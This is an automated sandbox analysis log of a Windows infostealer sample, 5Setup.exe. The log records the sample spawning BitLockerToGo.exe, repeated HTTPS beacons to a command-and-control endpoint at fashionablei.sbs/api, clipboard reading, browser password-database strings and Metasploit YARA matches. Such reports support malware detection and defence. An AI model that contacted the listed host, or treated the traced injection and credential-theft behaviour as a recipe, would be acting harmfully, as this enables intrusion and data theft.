                      Source: BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: BitLockerToGo.exe, 00000001.00000003.1947187258.0000000003209000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1891228978.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1975164075.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2024116658.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1933964546.0000000003205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/
                      Source: BitLockerToGo.exe, 00000001.00000003.1975316936.0000000005479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/..
                      Source: BitLockerToGo.exe, 00000001.00000003.2023599483.000000000320F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1961643606.0000000005471000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987860778.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1933964546.0000000003205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/api
                      Source: BitLockerToGo.exe, 00000001.00000003.2023658335.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2024116658.00000000031A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/api4
                      Source: BitLockerToGo.exe, 00000001.00000003.2023658335.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2024116658.00000000031A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/apiH
                      Source: BitLockerToGo.exe, 00000001.00000003.1933964546.0000000003205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/apiO
                      Source: BitLockerToGo.exe, 00000001.00000003.1934413689.0000000003209000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1933964546.0000000003205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/api_
                      Source: BitLockerToGo.exe, 00000001.00000003.1946815014.0000000003209000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1961874563.000000000320B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1947187258.0000000003209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/apib
                      Source: BitLockerToGo.exe, 00000001.00000002.2024217475.000000000320F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2023599483.000000000320F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/apibuo
                      Source: BitLockerToGo.exe, 00000001.00000003.1975348693.0000000003209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/apid
                      Source: BitLockerToGo.exe, 00000001.00000003.1961874563.000000000320B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/apiob
                      Source: BitLockerToGo.exe, 00000001.00000003.1988260687.0000000003213000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987980224.000000000320C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987567495.0000000003207000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1975348693.0000000003209000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1988040262.000000000320D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987700095.000000000320A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/apiopK
                      Source: BitLockerToGo.exe, 00000001.00000003.1988260687.0000000003213000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2024217475.000000000320F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987980224.000000000320C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987567495.0000000003207000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1988040262.000000000320D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987700095.000000000320A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2023599483.000000000320F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/apiq
                      Source: BitLockerToGo.exe, 00000001.00000003.1961874563.000000000320B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/ay
                      Source: BitLockerToGo.exe, 00000001.00000002.2024024374.000000000316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/n
                      Source: BitLockerToGo.exe, 00000001.00000003.1961874563.000000000320B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs/re
                      Source: BitLockerToGo.exe, 00000001.00000003.1987980224.000000000320C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987567495.0000000003207000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987700095.000000000320A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fashionablei.sbs:443/api
                      Source: 5Setup.exeString found in binary or memory: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-cont
                      Source: 5Setup.exeString found in binary or memory: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resourcesKind
                      Source: 5Setup.exeString found in binary or memory: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kindsThe
                      Source: 5Setup.exeString found in binary or memory: https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types
                      Source: 5Setup.exeString found in binary or memory: https://golang.org/pkg/unicode/#IsPrint.
                      Source: 5Setup.exeString found in binary or memory: https://golang.org/pkg/unicode/#IsPrint.values
                      Source: BitLockerToGo.exe, 00000001.00000003.1919884934.00000000054D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                      Source: BitLockerToGo.exe, 00000001.00000003.1947926828.0000000005598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: BitLockerToGo.exe, 00000001.00000003.1947926828.0000000005598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                      Source: BitLockerToGo.exe, 00000001.00000003.1919884934.00000000054CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: BitLockerToGo.exe, 00000001.00000003.1919884934.00000000054CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                      Source: BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: BitLockerToGo.exe, 00000001.00000003.1947926828.0000000005598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: BitLockerToGo.exe, 00000001.00000003.1947926828.0000000005598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: BitLockerToGo.exe, 00000001.00000003.1947926828.0000000005598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: BitLockerToGo.exe, 00000001.00000003.1947926828.0000000005598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: BitLockerToGo.exe, 00000001.00000003.1947926828.0000000005598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00436960 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_00436960
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00436960 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_00436960

                      System Summary

                      barindex
                      Source: 00000000.00000002.1880927609.0000000001F56000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                      Source: 00000000.00000002.1880927609.0000000001E42000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004103701_2_00410370
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004233301_2_00423330
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042A4D01_2_0042A4D0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040F4901_2_0040F490
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041D6671_2_0041D667
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004466001_2_00446600
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004309A11_2_004309A1
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043CAF01_2_0043CAF0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00426B581_2_00426B58
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042FD631_2_0042FD63
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00420D601_2_00420D60
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00446E501_2_00446E50
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040EE201_2_0040EE20
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042EE3D1_2_0042EE3D
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040FE861_2_0040FE86
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00429FE01_2_00429FE0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004070401_2_00407040
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004010001_2_00401000
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004090061_2_00409006
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040A0201_2_0040A020
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042C0201_2_0042C020
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042B03C1_2_0042B03C
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004110D71_2_004110D7
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004220901_2_00422090
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004260BA1_2_004260BA
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043C1521_2_0043C152
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004451201_2_00445120
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040B1301_2_0040B130
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004441C01_2_004441C0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004341D41_2_004341D4
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043C1801_2_0043C180
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042F1A21_2_0042F1A2
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004132271_2_00413227
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004012D51_2_004012D5
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004293401_2_00429340
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042B30E1_2_0042B30E
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004013281_2_00401328
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043C3E01_2_0043C3E0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042D3EA1_2_0042D3EA
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040D3F01_2_0040D3F0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004304171_2_00430417
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004454D01_2_004454D0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004164931_2_00416493
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004314951_2_00431495
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043D4B81_2_0043D4B8
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040A5001_2_0040A500
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004365201_2_00436520
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004405D01_2_004405D0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004446401_2_00444640
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004293401_2_00429340
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004156C11_2_004156C1
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040971D1_2_0040971D
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004177361_2_00417736
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042A7E21_2_0042A7E2
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040D7801_2_0040D780
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004458001_2_00445800
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004468C01_2_004468C0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004038E01_2_004038E0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041E8821_2_0041E882
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041F8A01_2_0041F8A0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043B91D1_2_0043B91D
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040E9201_2_0040E920
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004229C01_2_004229C0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004259D01_2_004259D0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004099A91_2_004099A9
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00407A601_2_00407A60
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00429ADE1_2_00429ADE
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00409A811_2_00409A81
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041CAB01_2_0041CAB0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00446B701_2_00446B70
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043DB761_2_0043DB76
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040ABC01_2_0040ABC0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040BC401_2_0040BC40
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00422CE01_2_00422CE0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00429D3E1_2_00429D3E
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00430FFE1_2_00430FFE
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00404FB01_2_00404FB0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040C830 appears 70 times
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0041C670 appears 196 times
                      Source: 5Setup.exe, 00000000.00000000.1681567936.0000000001144000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesetup.exel& vs 5Setup.exe
                      Source: 5Setup.exe, 00000000.00000002.1880927609.0000000001E08000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 5Setup.exe
                      Source: 5Setup.exeBinary or memory string: OriginalFilenamesetup.exel& vs 5Setup.exe
                      Source: 5Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.1880927609.0000000001F56000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                      Source: 00000000.00000002.1880927609.0000000001E42000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043CE40 CoCreateInstance,SysAllocString,1_2_0043CE40
                      Source: 5Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\5Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 5Setup.exe, 00000000.00000000.1680982063.00000000009C0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: 5Setup.exe, 00000000.00000000.1680982063.00000000009C0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                      Source: 5Setup.exe, 00000000.00000000.1680982063.00000000009C0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: BitLockerToGo.exe, 00000001.00000003.1920000342.00000000054A6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1920539504.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: 5Setup.exe, 00000000.00000000.1680982063.00000000009C0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: 5Setup.exeString found in binary or memory: %d response missing Location headerP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinityhttp2: scheme must be http or httpshttp2: Framer %p: read %v. Type: %vPUSH_PROMISE frame with stream ID 0mlkem768: invalid ciphertext length%d extra bits on block, should be 0zero matchoff and matchlen (%d) > 0chacha20: output smaller than inputct must be of length CiphertextSizebuf must be of length PublicKeySizetruncated input (or invalid offset)crypto/blake2b: cannot marshal MACscrypto/blake2s: cannot marshal MACsTime.UnmarshalBinary: invalid lengthlocale not found when calling %s: %vcrypto/cipher: input not full blocksbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionaccessing a corrupted shared libraryfailure to read data directories: %vfail to read section relocations: %vfail to read string table length: %vstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
                      Source: 5Setup.exeString found in binary or memory: %d response missing Location headerP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinityhttp2: scheme must be http or httpshttp2: Framer %p: read %v. Type: %vPUSH_PROMISE frame with stream ID 0mlkem768: invalid ciphertext length%d extra bits on block, should be 0zero matchoff and matchlen (%d) > 0chacha20: output smaller than inputct must be of length CiphertextSizebuf must be of length PublicKeySizetruncated input (or invalid offset)crypto/blake2b: cannot marshal MACscrypto/blake2s: cannot marshal MACsTime.UnmarshalBinary: invalid lengthlocale not found when calling %s: %vcrypto/cipher: input not full blocksbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionaccessing a corrupted shared libraryfailure to read data directories: %vfail to read section relocations: %vfail to read string table length: %vstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
                      Source: 5Setup.exeString found in binary or memory: net/addrselect.go
                      Source: 5Setup.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
                      Source: 5Setup.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
                      Source: unknownProcess created: C:\Users\user\Desktop\5Setup.exe "C:\Users\user\Desktop\5Setup.exe"
                      Source: C:\Users\user\Desktop\5Setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                      Source: C:\Users\user\Desktop\5Setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\5Setup.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Users\user\Desktop\5Setup.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
